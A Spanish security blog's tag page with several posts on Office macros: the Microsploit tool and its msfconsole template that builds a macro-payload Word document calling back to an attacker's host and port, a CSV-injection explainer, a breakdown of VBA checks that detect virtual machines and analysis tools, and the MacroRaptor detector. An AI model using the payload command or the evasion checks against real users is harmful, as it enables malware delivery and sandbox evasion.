Este blog ya no está activo, sigue informándote aquí:

Mostrar todo
Mostrando entradas con la etiqueta Macros. Mostrar todas las entradas
Mostrando entradas con la etiqueta Macros. Mostrar todas las entradas

miércoles, 24 de mayo de 2017

Microsploit.- Trasteando con Office y Metasploit.

La verdad es que no se muy bien como calificar a este script pero la verdad es que es una buena herramienta si quieres trastear con documentos Office maliciosos. No se si os pasará a vosotros pero metasploit se me hace un poco pesado a la hora de trabajar con el, sobretodo si no tienes muy claro que exploit en concreto estas buscando por eso Microsploit mola. Gracias al menú podemos seleccionar que tipo de bicho queremos y el script por si solo interectua con metasploit y nos genera  el documento con macros en la carpeta output.


Ejemplo de como actúa el script con metasploit: 

"$msfconsole -x 'use exploit/multi/fileformat/office_word_macro; set payload $payloads ; set FILENAME $fira.docm; set BODY $bodys; set lhost $yourip ; set lport $yourport; set target 1; exploit; exit -y'" 
echo "" 
mv ~/.msf4/local/$fira.docm $path/output/$fira.docm

 Recomendable, pero siempre sabiendo lo que se está haciendo (aquí se ha hablado mucho sobre word con macros) y se necesitarán unas nociones básicas de metasploit.

Enlace al GitHub:



Sed Buenos ;)
Publicado por en 2 comentarios:
Etiquetas , , ,

martes, 29 de noviembre de 2016

Paper.- Manual para Macros en Excel

Hoy me encontraba creando un Excel con macros en VB (visual basic), una broma sin importancia para los minions que necesitan que se les meta la seguridad informática a base de hacerles jugarretas, y me he dado cuenta que, a parte de la típica [función shell()]  para llamar al programa o script que queremos que se ejecute, iba muy pero que muy pez con Visual Basic y mas con su integración con Excel y Word. 


Así que nada, aprovechando que la Universidad Politécnica de Valencia lanzó en 2014 un manual básico es hora de reciclarse un poco:
Muy interesante si queremos pasar una tarde trasteando con Excel. 

Sed Buenos ;) 
Publicado por en No hay comentarios:
Etiquetas , , , ,

martes, 13 de septiembre de 2016

Inyección de Macros en CSV Excel

Últimamente las Macros en documentos ofimáticos es una de los vectores de ataque mas utilizado. Así que habrá que aprender un poco como funcionan estos temas para poder defendernos y como no hoy os recomiendo un blog donde lo explican prácticamente desde 0 y podemos hacer el nuestro propio (Ojo, la macro será sencilla. Pero nos ayudará a aprender).


La inyección en CSV es una vulnerabilidad que afecta a las aplicaciones que tiene la funcionalidad de exportar hojas de cálculo generadas dinámicamente a partir de entradas inválidas o sin filtrar 
Las aplicaciones web modernas ofrecen la función de exportar las hoja de cálculo. Esto permite al usuario descargar los datos en un formato .csv o .xls, que es perfecto para el manejo de hojas de cálculo con MS-Excel y OpenOffice Calc. 
Esta vulnerabilidad puede ser utilizada por un atacante para ejecutar ataques tales como la inyección de comandos del lado del cliente o de inyección de código.

Enlace al blog y fuente de la noticia:

Sed Buenos ;) 


Publicado por en No hay comentarios:
Etiquetas , , ,

lunes, 18 de julio de 2016

VBA Macro que detecta Máquinas Virtuales

Llevo una temporada muy metido en la detección de maquinas virtuales por parte de diferentes Malwares.  Yo, hasta hace unos días, pensaba que esta habilidad solo la podían poseer software puramente hecho con un fines malicioso y no desde una Macro VBA desde un Word. 


Pues nada mas lejos de la realidad,  existen Macros VBA que son capaces de detectar si están corriendo en una máquina virtual hasta de 3 maneras:
  1. El primer método de detección tiene dos etapas: 
    1. La primera etapa de estas verificaciones, es mirar si la variable de entorno "USERNAME" es igual a "USER" y "USERDOMAIN" es igual a "HOST". Si ambos valores son verdaderos se activa la detección. Si no, salta a la segunda etapa.
    2. En la segunda etapa y con la ayuda de WMI (Windows Management Instrumentation), el método de detección llama al comando: GetObject ( " winmgmts: ") .InstancesOf ( " Win32_ComputerSystem "). Esto crea con el comando WMI "winmgmts" una instancia de " Win32_ComputerSystem" . Este ejemplo contiene toda la información sobre el sistema. Ademas se busca información sobre el "Fabricante" y "Modelo" y comprueba si contiene una de las siguientes cadenas: "KVM", "QEMU", "HAT", "VIRTUAL", "VMware", " XEN ". Si lo hace, el método de detección activa y devuelve un True.
  2. El segundo método también utiliza WMI para obtener toda la lista de procesos en ejecución:
    1. GetObject ( " winmgmts: ") .ExecQuery ( " Select * from Win32_Process ")
    2. En una seguna etapa la macro buscará las siguientes cadenas en la lista de procesos:
      “FIDDLER”, “PROCEXP”, “PROCMON”, “SNORT”, “SURICATA”, “WIRESHARK”
  3. Para acabar solo se hace una búsqueda a la siguiente cadena 1461591186_usa en el directorio del documento, para ello se utiliza la siguiente comando:
    1. InStr(1, callByName(ThisDocument, "Path", 2), "1461591186_usa") <> 0
Fuente y muchísima mas información sobre sobre el destripar de las Macros: 


Sed Buenos ;) 
Publicado por en No hay comentarios:
Etiquetas , , , ,

jueves, 30 de junio de 2016

MacroRaptor.- Python vs Macros VBA

Hay que ver como nos gusta Python a los que nos movemos en el mundo de la seguridad informática. Al menos yo no paro de descubrir scripts y/o módulos nuevos que nos pueden ayudar a detectar vulnerabilidades o diferentes ataque.

A mi, como ya sabéis, me encanta Python y hoy quiero recomendaros MacroRaptor un script que nos permite detectar macros VBA (Visual Basic for Aplications) las cuales permitirían a un atacante evitar nuestro antivirus de una manera muy fácil y ejecutar lo que se quiera. 

Ejemplo:



Usage del script:

Usage: mraptor.py [options] <filename> [filename2 ...]

Options:
  -h, --help            show this help message and exit
  -r                    find files recursively in subdirectories.
  -z ZIP_PASSWORD, --zip=ZIP_PASSWORD
                        if the file is a zip archive, open all files from it,
                        using the provided password (requires Python 2.6+)
  -f ZIP_FNAME, --zipfname=ZIP_FNAME
                        if the file is a zip archive, file(s) to be opened
                        within the zip. Wildcards * and ? are supported.
                        (default:*)
  -l LOGLEVEL, --loglevel=LOGLEVEL
                        logging level debug/info/warning/error/critical
                        (default=warning)
  -m, --matches         Show matched strings.

An exit code is returned based on the analysis result:
 - 0: No Macro
 - 1: Not MS Office
 - 2: Macro OK
 - 10: ERROR
 - 20: SUSPICIOUS

También podemos usar este script como módulo pero para eso os recomiendo que os descarguéis el script y juguéis un poco con el:

 

Sed Buenos ;)
Publicado por en No hay comentarios:
Etiquetas , , ,
Suscribirse a: Entradas (Atom)